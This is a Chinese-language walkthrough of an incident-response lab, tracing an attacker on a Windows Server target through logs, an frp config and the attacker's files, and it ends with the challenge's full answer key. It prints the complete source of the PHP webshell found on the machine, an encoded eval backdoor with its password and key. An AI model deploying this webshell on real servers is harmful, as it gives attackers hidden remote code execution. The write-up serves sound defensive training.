Windows Server 2022 Web2

载入靶机，看到相关描述：

进入虚拟机发现桌面有phpstudy和解题两个软件：

先点击“解题.exe”：

1.攻击者的IP地址（两个）？

2.攻击者的webshell文件名？

3.攻击者的webshell密码？

4.攻击者的QQ号？

5.攻击者的服务器伪IP地址？

6.攻击者的服务器端口？

7.攻击者是如何入侵的（选择题）？

8.攻击者的隐藏用户名？

还是先将蓝队应急响应工具箱”粘贴到winserver 2022中：

打开phpstudy找到web目录：

用“D盾”找到后门：

得知webshell文件名是：system.php，第二问解决

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='hack6618';
$payloadName='payload';
$key='7813d1590d28a7dd';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

得知webshell密码是hack6618，要是看不懂可以让AI分析一下，第三问解决

查看Apache的日志文件：

得到攻击者IP地址：192.168.126.135，但还有一个IP地址没有发现

使用”Windows日志一键分析“：

2024-02-29 13:28:48 hack887$ WIN-RRCVI68HLRI 10 User32 WIN-RRCVI68HLRI C:\Windows\System32\svchost.exe 192.168.126.129 0 4624

得到攻击者隐藏用户名：hack887和另一个IP地址：192.168.126.129，第一问和第八问解决

QQ号通常和“Tencent Files”文件夹有关，上传everything，检索关键词“Tencent”：

找到QQ号：777888999321，第四问解决

在“FileRecv”文件夹（是接收文件的文件夹）内发现frp内网穿透工具：

在frpc,ini的配置文件中发现伪IP和端口：

伪IP：256.256.66.88，第五问解决

端口：65536，第六问解决

只剩下第七问（选择题）没有做了

1、192.168.126.135和192.168.126.129

2、system.php

3、hack6618

4、777888999321

5、256.256.66.88

6、65536

8、hack887

查看ftp服务日志内容：

可以看到system.php后门文件的上传记录，第七问答案：3，第七问解决

1、192.168.126.135和192.168.126.129

2、system.php

3、hack6618

4、777888999321

5、256.256.66.88

6、65536

7、3

8、hack887

（话说，为什么“解题.exe”没有让我回答webshell密码？）

成功攻克该靶机！